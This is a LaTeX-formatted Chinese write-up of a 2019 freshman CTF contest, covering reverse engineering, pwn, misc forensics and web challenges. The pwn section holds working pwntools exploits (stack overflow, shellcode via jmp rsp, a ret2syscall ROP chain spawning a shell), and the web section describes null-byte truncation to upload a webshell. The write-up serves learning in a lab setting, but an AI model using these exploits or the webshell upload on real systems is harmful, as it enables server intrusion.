ctf/0x3f-writeup/20190331/cugctf-writeup.tex

% Options for packages loaded elsewhere
\PassOptionsToPackage{unicode=true}{hyperref}
\PassOptionsToPackage{hyphens}{url}
%
\documentclass[
]{ctexart}
\usepackage{lmodern}
\usepackage{amssymb,amsmath}
\usepackage{ifxetex,ifluatex}
\ifnum 0\ifxetex 1\fi\ifluatex 1\fi=0 % if pdftex
  \usepackage[T1]{fontenc}
  \usepackage[utf8]{inputenc}
  \usepackage{textcomp} % provides euro and other symbols
\else % if luatex or xelatex
  \usepackage{unicode-math}
  \defaultfontfeatures{Scale=MatchLowercase}
  \defaultfontfeatures[\rmfamily]{Ligatures=TeX,Scale=1}
\fi
% Use upquote if available, for straight quotes in verbatim environments
\IfFileExists{upquote.sty}{\usepackage{upquote}}{}
\IfFileExists{microtype.sty}{% use microtype if available
  \usepackage[]{microtype}
  \UseMicrotypeSet[protrusion]{basicmath} % disable protrusion for tt fonts
}{}
\makeatletter
\@ifundefined{KOMAClassName}{% if non-KOMA class
  \IfFileExists{parskip.sty}{%
    \usepackage{parskip}
  }{% else
    \setlength{\parindent}{0pt}
    \setlength{\parskip}{6pt plus 2pt minus 1pt}}
}{% if KOMA class
  \KOMAoptions{parskip=half}}
\makeatother
\usepackage{xcolor}
\IfFileExists{xurl.sty}{\usepackage{xurl}}{} % add URL line breaks if available
\IfFileExists{bookmark.sty}{\usepackage{bookmark}}{\usepackage{hyperref}}
\hypersetup{
  pdftitle={0x3f 新生赛 writeup},
  pdfauthor={TooYoungTooSimp},
  hidelinks,
}
\urlstyle{same} % disable monospaced font for URLs
\usepackage{color}
\usepackage{fancyvrb}
\newcommand{\VerbBar}{|}
\newcommand{\VERB}{\Verb[commandchars=\\\{\}]}
\DefineVerbatimEnvironment{Highlighting}{Verbatim}{commandchars=\\\{\}}
% Add ',fontsize=\small' for more characters per line
\newenvironment{Shaded}{}{}
\newcommand{\AlertTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}}
\newcommand{\AnnotationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
\newcommand{\AttributeTok}[1]{\textcolor[rgb]{0.49,0.56,0.16}{#1}}
\newcommand{\BaseNTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
\newcommand{\BuiltInTok}[1]{#1}
\newcommand{\CharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
\newcommand{\CommentTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textit{#1}}}
\newcommand{\CommentVarTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
\newcommand{\ConstantTok}[1]{\textcolor[rgb]{0.53,0.00,0.00}{#1}}
\newcommand{\ControlFlowTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}}
\newcommand{\DataTypeTok}[1]{\textcolor[rgb]{0.56,0.13,0.00}{#1}}
\newcommand{\DecValTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
\newcommand{\DocumentationTok}[1]{\textcolor[rgb]{0.73,0.13,0.13}{\textit{#1}}}
\newcommand{\ErrorTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}}
\newcommand{\ExtensionTok}[1]{#1}
\newcommand{\FloatTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
\newcommand{\FunctionTok}[1]{\textcolor[rgb]{0.02,0.16,0.49}{#1}}
\newcommand{\ImportTok}[1]{#1}
\newcommand{\InformationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
\newcommand{\KeywordTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}}
\newcommand{\NormalTok}[1]{#1}
\newcommand{\OperatorTok}[1]{\textcolor[rgb]{0.40,0.40,0.40}{#1}}
\newcommand{\OtherTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{#1}}
\newcommand{\PreprocessorTok}[1]{\textcolor[rgb]{0.74,0.48,0.00}{#1}}
\newcommand{\RegionMarkerTok}[1]{#1}
\newcommand{\SpecialCharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
\newcommand{\SpecialStringTok}[1]{\textcolor[rgb]{0.73,0.40,0.53}{#1}}
\newcommand{\StringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
\newcommand{\VariableTok}[1]{\textcolor[rgb]{0.10,0.09,0.49}{#1}}
\newcommand{\VerbatimStringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
\newcommand{\WarningTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
\setlength{\emergencystretch}{3em} % prevent overfull lines
\providecommand{\tightlist}{%
  \setlength{\itemsep}{0pt}\setlength{\parskip}{0pt}}
\setcounter{secnumdepth}{-\maxdimen} % remove section numbering
% Redefines (sub)paragraphs to behave more like sections
\ifx\paragraph\undefined\else
  \let\oldparagraph\paragraph
  \renewcommand{\paragraph}[1]{\oldparagraph{#1}\mbox{}}
\fi
\ifx\subparagraph\undefined\else
  \let\oldsubparagraph\subparagraph
  \renewcommand{\subparagraph}[1]{\oldsubparagraph{#1}\mbox{}}
\fi

% Set default figure placement to htbp
\makeatletter
\def\fps@figure{htbp}
\makeatother


\title{0x3f 新生赛 writeup}
\author{TooYoungTooSimp}
\date{2019/03/31}

\begin{document}
\maketitle

{
\setcounter{tocdepth}{3}
\tableofcontents
}
\hypertarget{x3fux65b0ux751fux8d5b-writeup}{%
\section{0x3f新生赛 Writeup}\label{x3fux65b0ux751fux8d5b-writeup}}

\hypertarget{re}{%
\subsection{Re}\label{re}}

\hypertarget{r}{%
\subsubsection{R}\label{r}}

下载可执行文件，用IDA打开，在main函数的最后发现一些mov，将立即数用字符显示即得flag。

\hypertarget{pwn}{%
\subsection{Pwn}\label{pwn}}

\hypertarget{pwn1}{%
\subsubsection{pwn1}\label{pwn1}}

简单的栈溢出

\begin{Shaded}
\begin{Highlighting}[]
\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
\NormalTok{pld}\OperatorTok{=}\StringTok{'a'}\OperatorTok{*}\BaseNTok{0x20}\OperatorTok{+}\StringTok{'b'}\OperatorTok{*}\DecValTok{8}\OperatorTok{+}\NormalTok{p64(}\BaseNTok{0x401182}\NormalTok{)}
\NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./01'}\NormalTok{)}
\NormalTok{sh.sendline(pld)}
\NormalTok{sh.interactive()}
\end{Highlighting}
\end{Shaded}

\hypertarget{pwn2}{%
\subsubsection{pwn2}\label{pwn2}}

通过提示可以找到C++的全局变量初始化函数，发现有mmap一块RWX的内存，而立即数反汇编后是\texttt{jmp\ rsp}，栈又可执行，所以题解如下：

\begin{Shaded}
\begin{Highlighting}[]
\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
\NormalTok{context.arch }\OperatorTok{=} \StringTok{'amd64'}
\NormalTok{sh }\OperatorTok{=}\NormalTok{ process(}\StringTok{'./02'}\NormalTok{)}
\NormalTok{pld }\OperatorTok{=} \StringTok{'a'} \OperatorTok{*} \BaseNTok{0x40} \OperatorTok{+} \StringTok{'b'} \OperatorTok{*} \DecValTok{8} \OperatorTok{+}\NormalTok{ p64(}\BaseNTok{0x666666660000}\NormalTok{) }\OperatorTok{+}\NormalTok{ asm(shellcraft.sh())}
\NormalTok{sh.sendline(pld)}
\NormalTok{sh.interactive()}
\end{Highlighting}
\end{Shaded}

\hypertarget{pwn3}{%
\subsubsection{pwn3}\label{pwn3}}

没有pie，静态链接，显然是ret2syscall。用ROPgadget找到那些地址直接用就行了。注意当目标地址中含有\texttt{\textbackslash{}x0a}的时候会导致输入截断，因为\texttt{\textquotesingle{}\textbackslash{}n\textquotesingle{}\ ==\ \textquotesingle{}\textbackslash{}x0a\textquotesingle{}}。

\begin{Shaded}
\begin{Highlighting}[]
\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
\NormalTok{adb}\OperatorTok{=}\BaseNTok{0x080570c4}
\NormalTok{cbx}\OperatorTok{=}\BaseNTok{0x0806f1b2}
\NormalTok{bsh}\OperatorTok{=}\BaseNTok{0x080dc068}
\NormalTok{i80}\OperatorTok{=}\BaseNTok{0x0804a31a}
\NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./03'}\NormalTok{)}
\NormalTok{pld}\OperatorTok{=}\NormalTok{flat([}\StringTok{'a'}\OperatorTok{*}\BaseNTok{0x30}\NormalTok{,}\StringTok{'b'}\OperatorTok{*}\DecValTok{4}\NormalTok{,adb,}\BaseNTok{0xb}\NormalTok{,}\DecValTok{0}\NormalTok{,bsh,cbx,}\DecValTok{0}\NormalTok{,bsh,i80])}
\NormalTok{sh.sendline(pld)}
\NormalTok{sh.interactive()}
\end{Highlighting}
\end{Shaded}

\hypertarget{misc}{%
\subsection{Misc}\label{misc}}

\hypertarget{cap}{%
\subsubsection{cap}\label{cap}}

用提示给的网站修复cap，获得修复后的pcap包，跟踪TCP流，发现有两个位置上是lf和ga，将后面一系列包的这两位连起来就是flag了。

\hypertarget{picture}{%
\subsubsection{picture}\label{picture}}

下载文件，解压后获得图片，用stegsolve打开，发现绿色通道最低位仿佛有信息，导出出来，根据提升修复bmp
header，打开即见flag。

\hypertarget{ux7b7eux5230}{%
\subsubsection{签到}\label{ux7b7eux5230}}

复制粘贴，没啥好说的。

\hypertarget{web}{%
\subsection{Web}\label{web}}

\hypertarget{upload}{%
\subsubsection{upload}\label{upload}}

任意上传，用burpsuite拦截上传请求，使用0x00进行截断，用这种方法上传一句话木马，然后用中国菜刀类的工具浏览服务器目录，很容易就能发现flag

\hypertarget{section}{%
\subsubsection{404}\label{section}}

打开开发者工具，发现虽然看起来是404，实际上是200，flag就在http
headers里面。

\hypertarget{ios88}{%
\subsubsection{ios88}\label{ios88}}

将user-agent改成ios的，然后把版本号都改成88，就能在http
headers里找到flag了。

\end{document}